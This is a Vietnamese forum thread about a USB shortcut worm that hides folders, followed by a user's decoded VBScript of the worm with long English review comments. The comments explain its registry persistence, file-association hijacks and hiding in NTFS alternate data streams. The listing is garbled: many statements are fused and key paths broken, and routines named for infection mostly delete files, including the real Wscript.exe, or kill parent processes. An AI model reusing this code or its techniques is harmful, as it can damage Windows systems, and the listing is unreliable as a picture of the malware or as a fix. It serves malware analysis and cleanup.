Chagiya

New Member
Máy tính em cũng mới bị dính tương tự mấy bác kia, giờ cũng không chạy được mấy file .bat nữa. Em quét virus rồi mà cũng không ăn thua hic
 

Fajer

New Member
Dùng FixAuto đi các bạn. Mình dùng FixAuto hiện các thư mục bị ẩn lên, xóa bỏ các shortcut rồi, quét virus bằng đĩa Boot. Ok rồi.
 
trời ơi mới chiều đem usb đi in cũng bị như vầy mấy cái folder bị copy và shortcut hết.kg biết làm sao.cứ xóa là nó hiện ra hoài

mà bây giờ muốn format usb vẫn kg dc
 
Mình cũng bị con này, là click nghịch chơi thôi, không hiểu nó giấu cái file .vbs ở chỗ nào


Search đúng cái tên 1283472473.vbs, xóa toàn bộ đi rồi mà vẫn không ăn thua. Gõ


%SystemRoot%\System32\WScript.exe "C:\WINDOWS\explorer.exe:1283472473.vbs" lại thấy nó chạy như bình thường


Ai biết nó load cái file C:\WINDOWS\explorer.exe:1283472473.vbs thế nào không?


Đây là code của nó nhờ thằng bạn decode rồi ngồi uncompress mãi mới xong :-s
Code: Dim Fso, WshShell

' Shared COM objects used by the rest of the script. The ProgIDs are written in
' random mixed case; ProgID lookup is case-insensitive, so these still resolve
' to Scripting.FileSystemObject and WScript.Shell. Any string match on these
' names (AV signature, log search) therefore has to be case-insensitive.
Set Fso = CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")

Set WshShell = CreateObject("wScRipT.SHelL")

' Script entry point: everything else is driven from Main.
Call Main

Sub Main()

' Entry routine: resolves the two script locations through GetMainVirus, calls
' VirusAlert once, then hands over to MonitorSystem, whose loop never exits.
' Errors are suppressed for the whole Sub, so a failing call is skipped silently.
On Error Resume Next

' Args, VirusLoad and VirusAss are assigned below but never read again here.
Dim Args, VirusLoad, VirusAss

Set Args = WScript.Arguments

VirusLoad = GetMainVirus(1)

VirusAss = GetMainVirus(0)

Call VirusAlert

Call MonitorSystem

End Sub

Sub MonitorSystem()

' Endless worker loop: every 3000 ms it re-runs InvadeSystem and KeepProcess.
' Because the Do...Loop has no exit condition, the hosting script process stays
' resident until it is killed; a script host that never terminates is the
' observable side of this routine.
On Error Resume Next

' ProcessNames and ExeFullNames are declared but unused; VBSFullNames is used
' without a Dim, so it becomes an implicit variable (no Option Explicit here).
Dim ProcessNames, ExeFullNames

VBSFullNames = Array(GetMainVirus(1))

Do

Call InvadeSystem(GetMainVirus(1), GetMainVirus(0))

Call KeepProcess(VBSFullNames)

WScript.Sleep 3000

Loop

End Sub

Sub InvadeSystem(VirusLoadPath, VirusAssPath)
' Per-pass worker called from MonitorSystem. It walks the ready drives, then
' compares a list of registry values with the command lines built below and,
' where they are equal, calls DeleteReg or the matching Set*Ass helper.
' The strings built here are the persistence indicators to look for on a host:
'   - a "Load" value under HKCU\...\Windows NT\CurrentVersion\Windows that
'     launches %SystemRoot%\system\svchost.exe with a script path, and
'   - shell\open\command values that route a file type through WScript.exe
'     followed by a script path.
On Error Resume Next
Dim Load_Value,File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, Version
Load_Value = "%SystemRoot%\system\svchost.exe " & """" & VirusLoadPath & """"
File_Value = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " %1 %* "
IE_Value = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " OIE "
MyCpt_Value1 = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " OMC "
MyCpt_Value2 = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " EMC "
HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
HCUVer = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"
' HCUDate, HostSourcePath, HostFilePath, Drive and DiskVirusName are not in the
' Dim list above; HCUVer, HCUDate and Version are not read again in this Sub.
HCUDate = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"
VirusCode = GetCode(WScript.ScriptFullName)
Version = 1
' GetSpecialFolder(1) is the System folder and GetSpecialFolder(0) the Windows
' folder, so HostFilePath names a file called svchost.exe in %SystemRoot%\system
' that is paired with the real Wscript.exe. A svchost.exe outside System32 is a
' masquerading indicator in its own right.
HostSourcePath = Fso.GetSpecialFolder(1) & "\Wscript.exe"
HostFilePath = Fso.GetSpecialFolder(0) & "\system\svchost.exe"
' DriveType 1/2/3 = removable, fixed and network drives: USB sticks and mapped
' shares are in scope, not only the local disk. The per-drive script name is the
' drive's own serial number plus ".vbs".
For Each Drive In Fso.Drives
If Drive.IsReady And (Drive.DriveType = 1 Or Drive.DriveType = 2 Or Drive.DriveType = 3) Then
DiskVirusName = GetSerialNumber(Drive.DriveLetter) & ".vbs"
Call CreateAutoRun(Drive.DriveLetter, DiskVirusName)
Call InfectRoot(Drive.DriveLetter, DiskVirusName)
End If
Next
' Runs only when at least one of the three artefacts is present. In this listing
' CreateFile and CopyFile only delete (see their bodies), so this branch removes
' files rather than writing them.
If Fso.FileExists(VirusAssPath) = True Or Fso.FileExists(VirusLoadPath) = True Or Fso.FileExists(HostFilePath) = True Then
' On NTFS only HostFilePath has its attributes reset; the two script paths are
' "file:stream" names there (see GetMainVirus) - presumably that is why they are
' skipped; confirm.
If GetFileSystemType(GetSystemDrive()) = "NTFS" Then
Call SetHiddenAttr(HostFilePath)
Call CreateFile(VirusCode, VirusAssPath)
Call CreateFile(VirusCode, VirusLoadPath)
Call CopyFile(HostSourcePath, HostFilePath)
Else
Call SetHiddenAttr(VirusAssPath)
Call CreateFile(VirusCode, VirusAssPath)
Call SetHiddenAttr(VirusLoadPath)
Call CreateFile(VirusCode, VirusLoadPath)
Call SetHiddenAttr(HostFilePath)
Call CopyFile(HostSourcePath, HostFilePath)
End If
End If

' NOTE(review): "End If" is fused onto the DeleteReg line below; the page lost a
' line break here and the statement does not parse as written.
If ReadReg(HCULoad) = Load_Value Then
Call DeleteReg(HCULoad) End If
' NOTE(review): every key path from here on contains a stray space ("txtfi le",
' "Appli cations", "10 69"). That looks like forum line-wrap damage; as written
' RegRead would not find these keys - check against a clean copy.
' Each test asks: "is this handler currently the WScript.exe + script command?"
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfi le\shell\open\command\") = File_Value Then
Call SetTxtFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifi le\shell\open\command\") = File_Value Then
Call SetIniFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffi le\shell\open\command\") = File_Value Then
Call SetInfFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfi le\shell\open\command\") = File_Value Then
Call SetBatFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfi le\shell\open\command\") = File_Value Then
Call SetCmdFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfi le\shell\open\command\") = File_Value Then
Call SetRegFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.f ile\shell\open\command\") = File_Value Then
Call SetchmFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfi le\shell\open\command\") = File_Value Then
Call SethlpFileAss(VirusAssPath)
End If
' Internet Explorer: the application's open command and the desktop icon's
' OpenHomePage verb, compared with the " OIE " variant of the command line.
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Appli cations\iexplore.exe\shell\open\command\") = IE_Value Then
Call SetIEAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-10 69-A2EA-08002B30309D}\shell\OpenHomePage\Command\") = IE_Value Then
Call SetIEAss(VirusAssPath)
End If
' My Computer namespace object: open and explore verbs (" OMC " / " EMC ").
If ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-10 69-A2D8-08002B30309D}\shell\open\command\") = MyCpt_Value1 Then
Call SetMyComputerAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-10 69-A2D8-08002B30309D}\shell\explore\command\") = MyCpt_Value2 Then
Call SetMyComputerAss(VirusAssPath)
End If
' Finally rewrite the Explorer visibility / AutoRun / shortcut settings.
Call RegSet
End Sub

Sub CopyFile(source, pathf)
' Despite the name, nothing is copied in this listing: pathf is force-deleted if
' it exists, and then source is force-deleted as well. Errors are suppressed.
' NOTE(review): InvadeSystem calls this with source = <System folder>\Wscript.exe,
' i.e. the genuine Windows Script Host binary, so the last line tries to delete
' it. If the listing is meant as a removal routine, only pathf (the svchost.exe
' copy) should go; verify Wscript.exe is intact after running anything like this.
On Error Resume Next
If Fso.FileExists(pathf) Then
Fso.DeleteFile pathf, True
End If
Fso.DeleteFile source, True
End Sub

Sub CreateFile(code, pathf)
' Despite the name, this only removes: if pathf exists it is force-deleted.
' The code argument is never used and no file is written.
On Error Resume Next
Dim FileText
If Fso.FileExists(pathf) Then
' NOTE(review): DeleteFile is a method without a return object, so the Set
' assignment is expected to raise an error that On Error Resume Next hides;
' whether the delete itself has already happened by then should be confirmed.
Set FileText = Fso.DeleteFile(pathf, True)
End If
End Sub

Sub RegSet()
' Rewrites four Explorer-related registry settings: the two "hidden files"
' radio-button values, the per-user AutoRun policy, and the shortcut marker on
' lnkfile. These are the settings to inspect when hidden folders cannot be shown
' or when .lnk files no longer carry the shortcut arrow.
On Error Resume Next
' NOTE(review): the Dim and the first assignment are fused on one line below
' (lost line break); the statement does not parse as written.
Dim RegPath1, RegPath2, RegPath3, RegPath4 RegPath1 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue"
RegPath2 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
RegPath3 = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun"
RegPath4 = "HKEY_CLASSES_ROOT\lnkfile\IsShortcut"
' NOHIDDEN=2 / SHOWALL=1 are presumably the stock values that make the
' "show hidden files" option work again - confirm for the Windows version.
Call WriteReg(RegPath1, 2, "REG_DWORD")
Call WriteReg(RegPath2, 1, "REG_DWORD")
' NOTE(review): this deletes the per-user NoDriveTypeAutoRun policy instead of
' setting it. After cleanup, check that AutoRun for removable drives is still
' disabled by policy, since AutoRun.inf is one of the artefacts handled here.
Call DeleteReg(RegPath3)
' An (empty) IsShortcut value on lnkfile is what makes Explorer draw the
' shortcut overlay, so .lnk files become visually distinguishable from folders.
Call WriteReg(RegPath4, "", "REG_SZ")
End Sub

Sub KeepProcess(VBSFullNames)
' Calls VBSProcessCount once per path in VBSFullNames and discards the result.
' In this listing VBSProcessCount terminates matching processes, so despite the
' name "Keep" the effect is to stop script hosts running those paths.
On Error Resume Next
For Each VBSFullName In VBSFullNames
VBSProcessCount(VBSFullName)
Next
End Sub

Function GetSystemDrive()
' Returns the first two characters of the Windows folder path (special folder
' 0), i.e. the drive designator such as "C:".
GetSystemDrive = Left(Fso.GetSpecialFolder(0), 2)
End Function

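Function GetFileSystemType(Drive)
' Returns the file system name of the given drive (for example "NTFS"), as
' reported by the FileSystemObject Drive object. Callers compare the result
' with "NTFS" to decide between stream paths and plain file paths.
' The page had fused the two statements onto one line; they are separated here.
    Dim D
    Set D = Fso.GetDrive(Drive)
    GetFileSystemType = D.FileSystem
End Function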

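Function ReadReg(strkey)
' Reads one registry value (or a key's default value when strkey ends with a
' backslash) through WScript.Shell.RegRead and returns it.
' No error handler is set here: a missing key raises in this function and is
' only suppressed if the caller runs under On Error Resume Next.
' The page had fused the Dim and the Set onto one line; they are separated here.
    Dim tmps
    Set tmps = CreateObject("WScript.Shell")
    ReadReg = tmps.RegRead(strkey)
    Set tmps = Nothing
End Function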

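Sub WriteReg(strkey, Value, vtype)
' Writes Value to the registry location strkey through WScript.Shell.RegWrite.
' vtype is the registry type name (for example "REG_DWORD", "REG_EXPAND_SZ");
' when it is the empty string RegWrite is called without a type.
' The page had broken this block: "Dim"/"Set" and the If/Else branches were
' fused, and "End If" was split across two lines. The structure is restored
' here; the calls and their arguments are unchanged.
    Dim tmps
    Set tmps = CreateObject("WScript.Shell")
    If vtype = "" Then
        tmps.RegWrite strkey, Value
    Else
        tmps.RegWrite strkey, Value, vtype
    End If
    Set tmps = Nothing
End Sub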

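Sub DeleteReg(strkey)
' Deletes the registry value (or key, when strkey ends with a backslash) named
' by strkey through WScript.Shell.RegDelete.
' No error handler is set here: deleting something that does not exist raises
' unless the caller runs under On Error Resume Next.
' The page had fused the Set and the RegDelete call onto one line; they are
' separated here.
    Dim tmps
    Set tmps = CreateObject("WScript.Shell")
    tmps.RegDelete strkey
    Set tmps = Nothing
End Sub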

Sub SetHiddenAttr(path)
' Despite the name, this clears attributes: the object found at path gets
' Attributes = 0, which removes hidden, system and read-only flags.
' path is tried first as a file and then as a folder; with errors suppressed,
' whichever lookup succeeds leaves vf pointing at the object.
On Error Resume Next
Dim vf
Set vf = Fso.GetFile(path)
' NOTE(review): the GetFolder call and the attribute assignment are fused on one
' line below (lost line break); the statement does not parse as written.
Set vf = Fso.GetFolder(path) vf.Attributes = 0
End Sub

Sub Run(ExeFullName)
' Launches ExeFullName through WScript.Shell.Run with default window style and
' without waiting. Not called anywhere in the visible listing.
On Error Resume Next
' Local WshShell shadows the script-level object of the same name.
Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run ExeFullName
Set WshShell = Nothing
End Sub

Sub InfectRoot(D, VirusName)
' Works on the root of drive D. In this listing it (1) clears the attributes of
' D:\<VirusName> and deletes it if present, (2) clears the attributes of every
' top-level folder, and (3) deletes D:\<folder>.lnk when that shortcut's target
' is D:\<VirusName>. This matches the symptom reported in the thread: folders
' hidden and replaced by same-named shortcuts on a USB stick.
On Error Resume Next
' NOTE(review): several statements in this Sub are fused onto one line (the Dim
' line, the CreateFile/End If line and the first line of the loop body); the
' page lost line breaks and these lines do not parse as written.
Dim VBSCode VBSCode = GetCode(WScript.ScriptFullName)
VBSPath = D & ":\" & VirusName
If Fso.FileExists(VBSPath) = True Then
Call SetHiddenAttr(VBSPath)
Call CreateFile(VBSCode, VBSPath) End If
Set Folder = Fso.GetFolder(D & ":\")
Set SubFolders = Folder.SubFolders
For Each SubFolder In SubFolders
' Args is built but not used afterwards in this Sub.
SetHiddenAttr (SubFolder.path) LnkPath = D & ":\" & SubFolder.Name & ".lnk" TargetPath = D & ":\" & VirusName Args = """" & D & ":\" & SubFolder.Name & "\Dir"""
' Only shortcuts that point at the script are removed; other .lnk files stay.
If Fso.FileExists(LnkPath) = True And GetTargetPath(LnkPath) = TargetPath Then
Fso.DeleteFile LnkPath, True
End If
Next
End Sub

Sub CreateAutoRun(D, VirusName)
' Handles the D:\AutoRun.inf / D:\<VirusName> pair on drive D. In this listing
' CreateFile only deletes, so the body clears attributes and removes whichever
' of the two files exists. VBSCode is never assigned and StrInf is not defined
' in the visible code.
On Error Resume Next
' NOTE(review): the Dim and the two assignments are fused on one line below
' (lost line break); the statement does not parse as written.
Dim InfPath, VBSPath, VBSCode InfPath = D & ":\AutoRun.inf": VBSPath = D & ":\" & VirusName
' NOTE(review): the body runs only when at least one of the two files is
' missing. If both exist nothing is removed here - for a cleanup routine that
' condition looks inverted; confirm the intent.
If Fso.FileExists(InfPath) = False Or Fso.FileExists(VBSPath) = False Then
Call SetHiddenAttr(VBSPath)
Call CreateFile(VBSCode, VBSPath)
Call SetHiddenAttr(InfPath)
Call CreateFile(StrInf, InfPath)
End If
End Sub
Sub SetTxtFileAss(sFilePath)
' Handler for the txtfile association. Unlike the sibling Set*FileAss routines,
' Value here is the WScript.exe + script command line, not a stock handler.
' NOTE(review): the WriteReg call below passes only two arguments (Value is
' missing) and names the "chm. file" key, not txtfile, so this block appears
' damaged or incomplete. Do not use it to repair a host; the sibling routines
' (for example SetIniFileAss) show the NOTEPAD.EXE form of a stock handler.
On Error Resume Next
' NOTE(review): Dim and assignment are fused on one line (lost line break).
Dim Value Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm. file\shell\open\command\", "REG_EXPAND_SZ")
End Sub
Sub SetIniFileAss(sFilePath)
' Writes the inifile open command as Notepad ("%SystemRoot%\system32\NOTEPAD.EXE
' %1"). sFilePath is not used.
On Error Resume Next
' NOTE(review): Dim and assignment are fused on one line, and the key path
' contains a stray space ("inif ile") - both look like page damage.
Dim Value Value = "%SystemRoot%\system32\NOTEPAD.EXE %1"
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inif ile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetInfFileAss(sFilePath)
' Writes the inffile open command as Notepad ("%SystemRoot%\system32\NOTEPAD.EXE
' %1"). sFilePath is not used.
On Error Resume Next
' NOTE(review): Dim and assignment are fused on one line, and the key path
' contains a stray space ("inff ile") - both look like page damage.
Dim Value Value = "%SystemRoot%\system32\NOTEPAD.EXE %1"
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inff ile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetBatFileAss(sFilePath)
' Writes the batfile open command as "%1" %* (run the batch file itself with
' its arguments). sFilePath is not used. A batfile handler that points anywhere
' else is consistent with the ".bat files no longer run" symptom reported
' earlier in the thread.
On Error Resume Next
' NOTE(review): Dim and assignment are fused on one line, and the key path
' contains a stray space ("batf ile") - both look like page damage.
Dim Value Value = """" & "%1" & """" & " %*"
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batf ile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetCmdFileAss(sFilePath)
' Writes the cmdfile open command as "%1" %* (run the .cmd file itself with its
' arguments). sFilePath is not used.
On Error Resume Next
' NOTE(review): Dim and assignment are fused on one line, and the key path
' contains a stray space ("cmdf ile") - both look like page damage.
Dim Value Value = """" & "%1" & """" & " %*"
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdf ile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SethlpFileAss(sFilePath)
' Writes the hlpfile open command as "%SystemRoot%\winhlp32.exe %1".
' sFilePath is not used.
On Error Resume Next
' NOTE(review): Dim and assignment are fused on one line, and the key path
' contains a stray space ("hlpf ile") - both look like page damage.
Dim Value Value = "%SystemRoot%\winhlp32.exe %1"
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpf ile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub

Sub SetRegFileAss(sFilePath)
' Writes the regfile open command as regedit.exe "%1". sFilePath is not used.
' While the .reg handler is redirected, importing a repair .reg file by
' double-click would not reach regedit, which is why this association matters
' during cleanup.
On Error Resume Next
' NOTE(review): Dim and assignment are fused on one line, and the key path
' contains a stray space ("regf ile") - both look like page damage.
Dim Value Value = "regedit.exe " & """" & "%1" & """"
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regf ile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub

Sub SetchmFileAss(sFilePath)
' Writes the chm.file open command as "%SystemRoot%\hh.exe" %1 (HTML Help).
' sFilePath is not used.
On Error Resume Next
' NOTE(review): Dim and assignment are fused on one line, and the key path
' contains a stray space ("chm. file") - both look like page damage.
Dim Value Value = """" & "%SystemRoot%\hh.exe" & """" & " %1"
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm. file\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub

Sub SetIEAss(sFilePath)
' Writes the quoted path "%ProgramFiles%\Internet Explorer\IEXPLORE.EXE" to two
' places: the iexplore.exe application open command and the OpenHomePage verb
' of the Internet Explorer desktop-icon CLSID. sFilePath is not used.
On Error Resume Next
' NOTE(review): Dim and assignment are fused on one line; the key paths contain
' stray spaces ("Appl ications", "1 069") and the second call has a space before
' the comma - all of it looks like page damage.
Dim Value Value = """%ProgramFiles%\Internet Explorer\IEXPLORE.EXE"""
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Appl ications\iexplore.exe\shell\open\command\", Value, "REG_EXPAND_SZ")
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1 069-A2EA-08002B30309D}\shell\OpenHomePage\Command\" , Value, "REG_EXPAND_SZ")
End Sub

Sub SetMyComputerAss(sFilePath)
' Rewrites the shell verbs of the My Computer namespace object
' ({20D04FE0-...}): the default verb is set to "none", and the open / explore
' commands are set to explorer.exe invocations of that same object.
' sFilePath is not used.
On Error Resume Next
' NOTE(review): the Dim and both assignments are fused on one line, and the key
' paths contain a stray space ("1 069") - both look like page damage.
Dim Value1, Value2 Value1 = "explorer.exe /n,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}" Value2 = "explorer.exe /n,/e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1 069-A2D8-08002B30309D}\shell\", "none", "REG_SZ")
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1 069-A2D8-08002B30309D}\shell\open\command\", Value1, "REG_EXPAND_SZ")
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1 069-A2D8-08002B30309D}\shell\explore\command\", Value2, "REG_EXPAND_SZ")
End Sub

Sub VirusAlert()
' Looks for BFAlert.hta in the System folder (special folder 1) and, if it
' exists, passes it to CreateFile - which in this listing deletes the file.
' HtaCode is never assigned. The file name is a host artefact worth checking.
On Error Resume Next
' NOTE(review): Dim and assignment are fused on one line (lost line break).
Dim HtaPath, HtaCode HtaPath = Fso.GetSpecialFolder(1) & "\BFAlert.hta"
If Fso.FileExists(HtaPath) = True Then
Call CreateFile(HtaCode, HtaPath)
End If
End Sub

Function GetSerialNumber(Drv)
' Returns the volume serial number of drive Drv as text with any "-" removed
' (presumably because SerialNumber can be negative - confirm).
' Callers append ".vbs" to this value to form the script name, so the name
' differs per volume: the "1283472473.vbs" quoted in the thread identifies one
' particular disk and is not a name to search for on other machines.
On Error Resume Next
' NOTE(review): three statements are fused on one line below (lost line breaks).
Set D = Fso.GetDrive(Drv) GetSerialNumber = D.SerialNumber GetSerialNumber = Replace(GetSerialNumber, "-", "")
End Function

Function GetMainVirus(N)
' Builds the path of the main script for special folder N (1 = System folder,
' 0 = Windows folder). The script name is the system drive's serial number plus
' ".vbs".
' On an NTFS system drive the result has the form "<folder>\smss.exe:<name>"
' (N = 1) or "<folder>\explorer.exe:<name>" (N = 0). The "file:name" syntax
' addresses an NTFS alternate data stream attached to that file. This is why a
' file-name search for "<serial>.vbs" finds nothing while WScript.exe can still
' be pointed at "C:\WINDOWS\explorer.exe:<serial>.vbs", as described in the
' thread. Streams do not appear in a normal directory listing; "dir /r" or the
' Sysinternals Streams utility lists them.
' On any other file system the result is an ordinary file inside the folder.
' For other values of N on NTFS the function returns nothing.
On Error Resume Next
MainVirusName = GetSerialNumber(GetSystemDrive()) & ".vbs"
If GetFileSystemType(GetSystemDrive()) = "NTFS" Then
If N = 1 Then
GetMainVirus = Fso.GetSpecialFolder(N) & "\smss.exe:" & MainVirusName
End If
If N = 0 Then
GetMainVirus = Fso.GetSpecialFolder(N) & "\explorer.exe:" & MainVirusName
End If
Else
GetMainVirus = Fso.GetSpecialFolder(N) & "\" & MainVirusName
End If
End Function

' Queries WMI for processes named cscript.exe, wscript.exe or svchost.exe and
' terminates every one whose command line contains VBSPath, together with that
' process's parent. Despite the name, nothing is counted: the return value is
' set to 0 and never changed.
' NOTE(review): the header is split across two lines ("Function" / name), and
' several statements below are fused on one line - page damage; the block does
' not parse as written.
Function
VBSProcessCount(VBSPath)
On Error Resume Next
Dim WMIService, ProcessList, Process, ParentProcess, PPID VBSProcessCount = 0
Set WMIService = GetObject("winmgmts:\\.\root\cimv2")
Set ProcessList = WMIService.execquery("Select * from Win32_Process Where " & "Name='cscript.exe' or Name='wscript.exe' or Name='svchost.exe'")
For Each Process In ProcessList
If InStr(Process.CommandLine, VBSPath) > 0 Then
' NOTE(review): the parent is terminated without checking what it is; if the
' script host was started from Explorer or a service, that process would be
' killed as well. ProcessList is also reassigned while it is being iterated.
PPID = Process.ParentProcessId Process.Terminate
Set ProcessList = WMIService.execquery("Select * from Win32_Process Where " & "ProcessId=" & PPID)
For Each ParentProcess In ProcessList ParentProcess.Terminate Next
End If
Next
' Second pass over ProcessList; after a match above this variable holds the
' parent-process query result, not the original list.
For Each Process In ProcessList
If InStr(Process.CommandLine, VBSPath) > 0 Then
Process.Terminate
End If
Next
End Function

Function GetTargetPath(LnkPath)
' Returns the TargetPath of the shortcut at LnkPath, read through the
' script-level WshShell object. CreateShortcut on an existing .lnk opens it for
' reading; nothing is saved here. Used to tell shortcuts that point at the
' script apart from legitimate ones.
On Error Resume Next
Dim Shortcut
Set Shortcut = WshShell.CreateShortcut(LnkPath)
GetTargetPath = Shortcut.TargetPath
End Function

Function GetCode(FullPath)
' Intended to return the full text of the file at FullPath (opened with mode 1,
' ForReading).
' NOTE(review): "Fso_OpenTextFile" is written with an underscore, so it is an
' undefined name, not a call to Fso.OpenTextFile; with errors suppressed the
' function would return empty. The ReadAll and Close statements are also fused
' on one line. Both look like page damage - confirm against a clean copy.
On Error Resume Next
Dim FileText
Set FileText = Fso_OpenTextFile(FullPath, 1)
GetCode = FileText.ReadAll FileText.Close
End Function

Function GetVersion()
' Despite the name, nothing is returned: the function deletes the "Ver" value
' under HKCU\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows. That value is
' a host artefact worth checking for. No error handler is set in this function.
Dim VerInfo
' NOTE(review): the assignment and the DeleteReg call are fused on one line
' below (lost line break).
VerInfo = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver" DeleteReg(VerInfo)
End Function

Function GetInfectedDate()
' Despite the name, nothing is returned: the function deletes the "Date" value
' under HKCU\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows. That value is
' a host artefact worth checking for, alongside "Ver" and "Load" in the same key.
On Error Resume Next
' NOTE(review): the Dim, the assignment and the DeleteReg call are fused on one
' line below (lost line breaks).
Dim DateInfo DateInfo = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date" DeleteReg(DateInfo)
End Function

 
